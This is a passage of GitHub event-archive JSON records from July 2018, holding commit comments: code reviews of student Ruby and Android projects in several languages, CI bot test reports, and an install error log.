`invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-18T21:29:38Z"}
{"id":"7985584074","type":"CommitCommentEvent","actor":{"login":"tramyardg"},"repo":{"name":"tramyardg/angularjs-tut"},"payload":{"comment":{"id":29756153,"position":null,"line":null,"path":null,"commit_id":"3537123f8c1022dff8cafc0f78ba7b8e9474b99a","created_at":"2018-07-18T21:29:52Z","updated_at":"2018-07-18T21:29:52Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/5623994/42908887-26fc73f8-8ab0-11e8-8409-1442d8a72b94.png)\r\n"}},"created_at":"2018-07-18T21:29:52Z"}
{"id":"7985588563","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29756171,"position":null,"line":null,"path":null,"commit_id":"f61c97a74c9e367f0020a23564f25940fa6d30c1","created_at":"2018-07-18T21:30:51Z","updated_at":"2018-07-18T21:30:51Z","author_association":"OWNER","body":"its the same as yours... you deleted it..."}},"created_at":"2018-07-18T21:30:51Z"}
{"id":"7985591563","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29756177,"position":null,"line":null,"path":null,"commit_id":"211f6d675eb46d0db995370046ac66c541a48378","created_at":"2018-07-18T21:31:30Z","updated_at":"2018-07-18T21:31:30Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-MacOS-10.9-clang: OK (2942 of 2942 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T21:31:30Z"}
{"id":"7985596468","type":"CommitCommentEvent","actor":{"login":"anmol26s"},"repo":{"name":"YunoHost-Apps/peertube_ynh"},"payload":{"comment":{"id":29756186,"position":null,"line":null,"path":null,"commit_id":"1d63c3fea98aee0d5e61b28fc7db9af14d073e3b","created_at":"2018-07-18T21:32:36Z","updated_at":"2018-07-18T21:32:36Z","author_association":"COLLABORATOR","body":"I am unable to install the peertube with your PR.\r\nHere is the error:\r\n\r\n```\r\n0 DEBUG + npm run reset-password -- -u root\r\n295902 DEBUG \r\n295903 DEBUG > peertube@1.0.0-beta.9 reset-password /var/www/peertube\r\n295903 DEBUG > node ./dist/scripts/reset-password.js \"-u\" \"root\"\r\n295903 DEBUG \r\n296132 WARNING module.js:549\r\n296132 WARNING     throw err;\r\n296133 WARNING     ^\r\n296133 WARNING \r\n296133 WARNING Error: Cannot find module '/var/www/peertube/dist/scripts/reset-password.js'\r\n296133 WARNING     at Function.Module._resolveFilename (module.js:547:15)\r\n296133 WARNING     at Function.Module._load (module.js:474:25)\r\n296134 WARNING     at Function.Module.runMain (module.js:693:10)\r\n296134 WARNING     at startup (bootstrap_node.js:191:16)\r\n296134 WARNING     at bootstrap_node.js:612:3\r\n296142 WARNING npm ERR! code ELIFECYCLE\r\n296142 WARNING npm ERR! errno 1\r\n296144 WARNING npm ERR! peertube@1.0.0-beta.9 reset-password: `node ./dist/scripts/reset-password.js \"-u\" \"root\"`\r\n296144 WARNING npm ERR! Exit status 1\r\n296144 WARNING npm ERR!\r\n296145 WARNING npm ERR! Failed at the peertube@1.0.0-beta.9 reset-password script.\r\n296145 WARNING npm ERR! This is probably not a problem with npm. There is likely additional logging output above.\r\n296155 WARNING \r\n296155 WARNING npm ERR! A complete log of this run can be found in:\r\n296155 WARNING npm ERR!     /root/.npm/_logs/2018-07-18T21_16_17_821Z-debug.log\r\n```\r\n"}},"created_at":"2018-07-18T21:32:36Z"}
{"id":"7985596538","type":"CommitCommentEvent","actor":{"login":"gcttong"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29756188,"position":79,"line":58,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"f094037d9569b8290efc2136dc3d3bf58039c2e5","created_at":"2018-07-18T21:32:37Z","updated_at":"2018-07-18T21:32:37Z","author_association":"COLLABORATOR","body":"yes! this has been fixed in commit c6c09fc5dfed7d4d4608136a56858c6ff07af7f2"}},"created_at":"2018-07-18T21:32:37Z"}
{"id":"7985600758","type":"CommitCommentEvent","actor":{"login":"declanjcurrey"},"repo":{"name":"caitlinalmond/GameOfThrones"},"payload":{"comment":{"id":29756196,"position":null,"line":null,"path":null,"commit_id":"58485cb7a51a301303cb9d10f7325363d511225c","created_at":"2018-07-18T21:33:34Z","updated_at":"2018-07-18T21:33:34Z","author_association":"COLLABORATOR","body":"Well done you 👍 "}},"created_at":"2018-07-18T21:33:34Z"}
{"id":"7985607793","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29756206,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T21:35:12Z","updated_at":"2018-07-18T21:35:12Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T21:35:12Z"}
{"id":"7985609293","type":"CommitCommentEvent","actor":{"login":"AlphaDE"},"repo":{"name":"topjohnwu/MagiskManager"},"payload":{"comment":{"id":29756208,"position":null,"line":null,"path":null,"commit_id":"831112abd2d7fd3df0b1680d1c73c458512e7745","created_at":"2018-07-18T21:35:33Z","updated_at":"2018-07-18T21:35:33Z","author_association":"NONE","body":"Would be great to hear on the reasons, as I suprised by that removal when updating to an OOS update and had to hassle to get the proper boot image on another way. At least for me, that option did work."}},"created_at":"2018-07-18T21:35:33Z"}
{"id":"7985610230","type":"CommitCommentEvent","actor":{"login":"Angristan"},"repo":{"name":"Stephanyan/google-spreadsheet-scraping"},"payload":{"comment":{"id":29756212,"position":null,"line":null,"path":null,"commit_id":"241bed2034c0658d6b4db41cd30d1c973cc05640","created_at":"2018-07-18T21:35:47Z","updated_at":"2018-07-18T21:35:47Z","author_association":"NONE","body":"Une sacrée gemme, ce commit\r\n"}},"created_at":"2018-07-18T21:35:47Z"}
{"id":"7985619762","type":"CommitCommentEvent","actor":{"login":"p3lim"},"repo":{"name":"BigWigsMods/packager"},"payload":{"comment":{"id":29756226,"position":null,"line":null,"path":null,"commit_id":"ac9ee143acdce584953a4e75ae142d6c3d708983","created_at":"2018-07-18T21:38:01Z","updated_at":"2018-07-18T21:38:01Z","author_association":"NONE","body":"This could use a quiet option."}},"created_at":"2018-07-18T21:38:01Z"}
{"id":"7985620115","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29756227,"position":29,"line":29,"path":"Lesson1/Right_triangle.rb","commit_id":"5e781d8728574c8750f45d37ed8f2ca72a643512","created_at":"2018-07-18T21:38:05Z","updated_at":"2018-07-18T21:38:05Z","author_association":"NONE","body":"Раз треугольник равносторонний, то он не может быть прямоугольным. Это условие имеет смысл вынести после определения массива сторон и прекратить дальнейшее выполнение программы, если это условие вернет правду"}},"created_at":"2018-07-18T21:38:05Z"}
{"id":"7985622110","type":"CommitCommentEvent","actor":{"login":"mowcreative"},"repo":{"name":"mowcreative/hello-world"},"payload":{"comment":{"id":29756231,"position":null,"line":null,"path":null,"commit_id":"335fda1663f1db72290bec923ceefa29fdd6229d","created_at":"2018-07-18T21:38:33Z","updated_at":"2018-07-18T21:38:33Z","author_association":"OWNER","body":"what's up?"}},"created_at":"2018-07-18T21:38:33Z"}
{"id":"7985623244","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29756237,"position":27,"line":27,"path":"Lesson1/Right_triangle.rb","commit_id":"5e781d8728574c8750f45d37ed8f2ca72a643512","created_at":"2018-07-18T21:38:49Z","updated_at":"2018-07-18T21:38:49Z","author_association":"NONE","body":"Обрати внимание, что по заданию равнобердренность нужно проверять Только у прямоугольного треугольника"}},"created_at":"2018-07-18T21:38:49Z"}
{"id":"7985623499","type":"CommitCommentEvent","actor":{"login":"MissArray"},"repo":{"name":"fac-14/Week3TakingAIME"},"payload":{"comment":{"id":29756238,"position":null,"line":null,"path":null,"commit_id":"fcf525403bc3f85afd758391487ab0b46612d383","created_at":"2018-07-18T21:38:53Z","updated_at":"2018-07-18T21:38:53Z","author_association":"COLLABORATOR","body":"* Added TFL line colours\r\n* Added margins to size form"}},"created_at":"2018-07-18T21:38:53Z"}
{"id":"7985630992","type":"CommitCommentEvent","actor":{"login":"mollyseith"},"repo":{"name":"mollyseith/oo-person-dc-web-071618"},"payload":{"comment":{"id":29756248,"position":null,"line":null,"path":null,"commit_id":"e730fc18cd6256fcc79b53e51e7b32669e47da04","created_at":"2018-07-18T21:40:42Z","updated_at":"2018-07-18T21:40:42Z","author_association":"OWNER","body":"team: @whynotski"}},"created_at":"2018-07-18T21:40:42Z"}
{"id":"7985633374","type":"CommitCommentEvent","actor":{"login":"mps4dev"},"repo":{"name":"Nebres/Kodilla-Course"},"payload":{"comment":{"id":29756255,"position":null,"line":null,"path":null,"commit_id":"66590e36044b7fe711e3a7b542c1e3678c22aba0","created_at":"2018-07-18T21:41:16Z","updated_at":"2018-07-18T21:41:16Z","author_association":"COLLABORATOR","body":"czemu quantity zmieniles na quality? :)"}},"created_at":"2018-07-18T21:41:16Z"}
{"id":"7985634860","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29756257,"position":7,"line":7,"path":"Lesson1/area_of ​_a_triangle.rb","commit_id":"5e781d8728574c8750f45d37ed8f2ca72a643512","created_at":"2018-07-18T21:41:37Z","updated_at":"2018-07-18T21:41:37Z","author_association":"NONE","body":"можно сделать получение, присваивание и конвертацию в одну строку.\r\nbase = gets.to_f"}},"created_at":"2018-07-18T21:41:37Z"}
{"id":"7985635564","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"cassandrakane/FBU-Instagram"},"payload":{"comment":{"id":29756260,"position":6,"line":43,"path":"app/src/main/java/com/example/cassandrakane/instagram/ProfileFragment.java","commit_id":"6d43b0c3b155bc13041664c3723795cf70d421ff","created_at":"2018-07-18T21:41:43Z","updated_at":"2018-07-18T21:41:43Z","author_association":"NONE","body":"In the old days, a \"b\" prefix often meant \"boolean\". It is more comment now to use the longer \"btn\"."}},"created_at":"2018-07-18T21:41:43Z"}
{"id":"7985640026","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"cassandrakane/FBU-Instagram"},"payload":{"comment":{"id":29756266,"position":11,"line":58,"path":"app/src/main/java/com/example/cassandrakane/instagram/ProfileFragment.java","commit_id":"6d43b0c3b155bc13041664c3723795cf70d421ff","created_at":"2018-07-18T21:42:40Z","updated_at":"2018-07-18T21:42:40Z","author_association":"NONE","body":"I actually don't know what the ButterKnife library does."}},"created_at":"2018-07-18T21:42:40Z"}
{"id":"7985644480","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29756273,"position":null,"line":null,"path":null,"commit_id":"d61275c291aa3fd0540293d7e01a6372e2d4923a","created_at":"2018-07-18T21:43:43Z","updated_at":"2018-07-18T21:43:43Z","author_association":"COLLABORATOR","body":"@fragsman  relax, relax, la verdad ni leí qué es. Solo vi muchos cascade all juntos y mi deber es advertirlos jajjajaja "}},"created_at":"2018-07-18T21:43:43Z"}
{"id":"7985646368","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29756279,"position":7,"line":7,"path":"Lesson1/area_of ​_a_triangle.rb","commit_id":"5e781d8728574c8750f45d37ed8f2ca72a643512","created_at":"2018-07-18T21:44:11Z","updated_at":"2018-07-18T21:44:11Z","author_association":"NONE","body":"и да, лучше избегать однобуквенных переменных. Они усложняют чтение кода. Когда ты читаешь, что base умножается на height и в результате выводится area понятно, что происходит в коде."}},"created_at":"2018-07-18T21:44:11Z"}
{"id":"7985647555","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"cassandrakane/FBU-Instagram"},"payload":{"comment":{"id":29756281,"position":43,"line":99,"path":"app/src/main/java/com/example/cassandrakane/instagram/ProfileFragment.java","commit_id":"6d43b0c3b155bc13041664c3723795cf70d421ff","created_at":"2018-07-18T21:44:28Z","updated_at":"2018-07-18T21:44:28Z","author_association":"NONE","body":"So are you doing this test for the string value because current bFollow is a TextView rather than a Button?"}},"created_at":"2018-07-18T21:44:28Z"}
{"id":"7985647705","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29756282,"position":null,"line":null,"path":null,"commit_id":"3195ec082f7e67c1226d165ac0581332f1146dba","created_at":"2018-07-18T21:44:30Z","updated_at":"2018-07-18T21:44:30Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-89](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-89).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-89-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-18T21:44:30Z"}
{"id":"7985654423","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29756304,"position":8,"line":8,"path":"Lesson1/ideal_weigth.rb","commit_id":"5e781d8728574c8750f45d37ed8f2ca72a643512","created_at":"2018-07-18T21:46:04Z","updated_at":"2018-07-18T21:46:04Z","author_association":"NONE","body":"chomp можно не использовать, если вызывается to_i/to_f после. Эти методы избавляются за нас от символа переноса строки"}},"created_at":"2018-07-18T21:46:04Z"}
{"id":"7985655661","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"cassandrakane/FBU-Instagram"},"payload":{"comment":{"id":29756305,"position":33,"line":89,"path":"app/src/main/java/com/example/cassandrakane/instagram/ProfileFragment.java","commit_id":"6d43b0c3b155bc13041664c3723795cf70d421ff","created_at":"2018-07-18T21:46:22Z","updated_at":"2018-07-18T21:46:22Z","author_association":"NONE","body":"Since you have more or less indentical code in the onclicklistener below, I'd create a method that does this, to prevent repeating the code; something like  **setIsFollowing(bFollow, true)**"}},"created_at":"2018-07-18T21:46:22Z"}
{"id":"7985656747","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29756306,"position":15,"line":15,"path":"Lesson1/ideal_weigth.rb","commit_id":"5e781d8728574c8750f45d37ed8f2ca72a643512","created_at":"2018-07-18T21:46:37Z","updated_at":"2018-07-18T21:46:37Z","author_association":"NONE","body":"Тут должна быть индентация в 2 пробела."}},"created_at":"2018-07-18T21:46:37Z"}
{"id":"7985661758","type":"CommitCommentEvent","actor":{"login":"chadversary"},"repo":{"name":"fritzk/OpenGL-Registry"},"payload":{"comment":{"id":29756317,"position":79,"line":79,"path":"extensions/MESA/MESA_framebuffer_flip_y.txt","commit_id":"f3eb6fbc96ac6d2ecff734bbb88bafdda1051322","created_at":"2018-07-18T21:47:52Z","updated_at":"2018-07-18T21:47:52Z","author_association":"NONE","body":"Weird. Github's Markdown stripped `<target>` and `<pname>` from my reply."}},"created_at":"2018-07-18T21:47:52Z"}
{"id":"7985668025","type":"CommitCommentEvent","actor":{"login":"JediKev"},"repo":{"name":"osTicket/osTicket"},"payload":{"comment":{"id":29756325,"position":4,"line":189,"path":"include/class.ostsession.php","commit_id":"424bfc99d93b920f6162b602eeea41125086425d","created_at":"2018-07-18T21:49:23Z","updated_at":"2018-07-18T21:49:23Z","author_association":"CONTRIBUTOR","body":"@jayvines \r\n\r\nIt should be fixed in [`1.11.0rc-1`](https://github.com/osTicket/osTicket/releases/tag/v1.11.0-rc1) (available for download [here](http://osticket.com/download)) with this [pull request](https://github.com/osTicket/osTicket/pull/3955).\r\n\r\nCheers."}},"created_at":"2018-07-18T21:49:23Z"}
{"id":"7985668566","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"cassandrakane/FBU-Instagram"},"payload":{"comment":{"id":29756326,"position":80,"line":153,"path":"app/src/main/java/com/example/cassandrakane/instagram/ProfileFragment.java","commit_id":"6d43b0c3b155bc13041664c3723795cf70d421ff","created_at":"2018-07-18T21:49:31Z","updated_at":"2018-07-18T21:49:31Z","author_association":"NONE","body":"user looks like a member variable. I know they dont teach this anymore, but I prefer member variables to start with _ or m_ or something to distinguish them from locals."}},"created_at":"2018-07-18T21:49:31Z"}
{"id":"7985672329","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29756334,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T21:50:26Z","updated_at":"2018-07-18T21:50:26Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T21:50:26Z"}
{"id":"7985673239","type":"CommitCommentEvent","actor":{"login":"barancev"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29756336,"position":6,"line":44,"path":"java/client/src/org/openqa/selenium/os/WindowsUtils.java","commit_id":"f41fe5fb1a9bebaf4a29f1a51f00a6b281400fe9","created_at":"2018-07-18T21:50:41Z","updated_at":"2018-07-18T21:50:41Z","author_association":"MEMBER","body":"You can implement your own utility functions to manage processes if you need them. Selenium does not use these functions internally anymore, and we decided to remove them, because they are out of scope, Selenium is not a tool to manage processes."}},"created_at":"2018-07-18T21:50:41Z"}
{"id":"7985680874","type":"CommitCommentEvent","actor":{"login":"djowdobom"},"repo":{"name":"ESX-Org/es_extended"},"payload":{"comment":{"id":29756350,"position":null,"line":null,"path":null,"commit_id":"f90ca1f03a92b5339a16a27b88d9784b93f217f8","created_at":"2018-07-18T21:52:36Z","updated_at":"2018-07-18T21:52:36Z","author_association":"NONE","body":"<3 !"}},"created_at":"2018-07-18T21:52:36Z"}
{"id":"7985683202","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756354,"position":17,"line":13,"path":"Lesson_1/quadratic_equation.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T21:53:10Z","updated_at":"2018-07-18T21:53:10Z","author_association":"NONE","body":"Это у нас сломается, когда дискрминант будет меньше 0. На самом деле, квадратный корень нам нужен только в сценарии, когда d > 0"}},"created_at":"2018-07-18T21:53:10Z"}
{"id":"7985683981","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29756360,"position":21,"line":2925,"path":"easyprivacy/easyprivacy_general.txt","commit_id":"c0c1cf653e84fdd5b54fae4fe7d85f429bfb4e3e","created_at":"2018-07-18T21:53:20Z","updated_at":"2018-07-18T21:53:20Z","author_association":"CONTRIBUTOR","body":"@Khrin see https://forums.lanik.us/viewtopic.php?f=64&t=41218"}},"created_at":"2018-07-18T21:53:20Z"}
{"id":"7985684224","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29756361,"position":null,"line":null,"path":null,"commit_id":"53fdc017a8d3f0eaf638c987fd8bc964e6a61a29","created_at":"2018-07-18T21:53:24Z","updated_at":"2018-07-18T21:53:24Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/88/display/redirect) (on internal Jenkins) failed in stage 'Running XM tests on '10.14'' 🔥 : hudson.AbortException: Xamarin.Mac tests on macOS 10.14 failed (introspection)\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/88//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/53fdc017a8d3f0eaf638c987fd8bc964e6a61a29/88/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/53fdc017a8d3f0eaf638c987fd8bc964e6a61a29/88/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/53fdc017a8d3f0eaf638c987fd8bc964e6a61a29/88/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Xamarin.Mac tests on macOS 10.14 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/88/display/redirect) 🔥\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/53fdc017a8d3f0eaf638c987fd8bc964e6a61a29/88/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n1 tests failed, 160 tests passed.\n\n## Failed tests\n\n * MTouch tests/NUnit: Failed (Execution failed with exit code 8)\n"}},"created_at":"2018-07-18T21:53:24Z"}
{"id":"7985684569","type":"CommitCommentEvent","actor":{"login":"regislebrun"},"repo":{"name":"openturns/openturns"},"payload":{"comment":{"id":29756362,"position":null,"line":null,"path":null,"commit_id":"2ce3240636520951a716bb561bd070181e36d72f","created_at":"2018-07-18T21:53:29Z","updated_at":"2018-07-18T21:53:29Z","author_association":"COLLABORATOR","body":"@sofianehaddad See [here](https://github.com/regislebrun/openturns/blob/fix_product_distribution_standard_deviation/validation/src/valid_ProductDistributionMoments.mw). Unfortunately it is not trivial to do the same thing for the centered moments. You see why? [Hint: the centering is different for the product than for the factors]"}},"created_at":"2018-07-18T21:53:29Z"}
{"id":"7985684655","type":"CommitCommentEvent","actor":{"login":"SteelWagstaff"},"repo":{"name":"robertknight/client"},"payload":{"comment":{"id":29756363,"position":null,"line":null,"path":null,"commit_id":"794b4779b763980aef41983ce52ec03a1645e5ec","created_at":"2018-07-18T21:53:30Z","updated_at":"2018-07-18T21:53:30Z","author_association":"NONE","body":"Rob--any news on whether this configuration setting could be merged into core? We'd love to use it as soon as it's available ..."}},"created_at":"2018-07-18T21:53:30Z"}
{"id":"7985689129","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756371,"position":29,"line":21,"path":"Lesson_1/quadratic_equation.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T21:54:37Z","updated_at":"2018-07-18T21:54:37Z","author_association":"NONE","body":"Не нужно оставлять пустую строку перед elsif и else"}},"created_at":"2018-07-18T21:54:37Z"}
{"id":"7985692866","type":"CommitCommentEvent","actor":{"login":"caioHatoum"},"repo":{"name":"caioHatoum/gestao_pruducao"},"payload":{"comment":{"id":29756379,"position":null,"line":null,"path":null,"commit_id":"3eec1672ca76ff40a943876220a48603483b7c1e","created_at":"2018-07-18T21:55:33Z","updated_at":"2018-07-18T21:55:33Z","author_association":"OWNER","body":"version 0.0.0"}},"created_at":"2018-07-18T21:55:33Z"}
{"id":"7985693003","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"cassandrakane/FBU-Instagram"},"payload":{"comment":{"id":29756382,"position":44,"line":47,"path":"app/src/main/res/layout/fragment_profile.xml","commit_id":"63580e16cbe828255b24be066870c11fb511c3ee","created_at":"2018-07-18T21:55:35Z","updated_at":"2018-07-18T21:55:35Z","author_association":"NONE","body":"Nominally, you should only use the \"+\" in the identifier in the \"android:id\" property.  If you use it here the compiler will not enforce it being defined elsewhere (which you presumably want since you are referencing it here)."}},"created_at":"2018-07-18T21:55:35Z"}
{"id":"7985695137","type":"CommitCommentEvent","actor":{"login":"blazertron"},"repo":{"name":"BVLC/caffe"},"payload":{"comment":{"id":29756385,"position":8,"line":34,"path":"docker/cpu/Dockerfile","commit_id":"4db619aec9cd384b11a1c55fac257d14b704bb15","created_at":"2018-07-18T21:56:05Z","updated_at":"2018-07-18T21:56:05Z","author_association":"NONE","body":"https://plus.google.com/photos/photo/106300736899724622932/6578490214434092098"}},"created_at":"2018-07-18T21:56:05Z"}
{"id":"7985699225","type":"CommitCommentEvent","actor":{"login":"Altcoin-Cash"},"repo":{"name":"GpuHot/Masternodescripts"},"payload":{"comment":{"id":29756391,"position":null,"line":null,"path":null,"commit_id":"91921c2cf948a037e0c82a434b070da834c49d52","created_at":"2018-07-18T21:57:00Z","updated_at":"2018-07-18T21:57:00Z","author_association":"CONTRIBUTOR","body":"Also moved logfile into .hthcore"}},"created_at":"2018-07-18T21:57:00Z"}
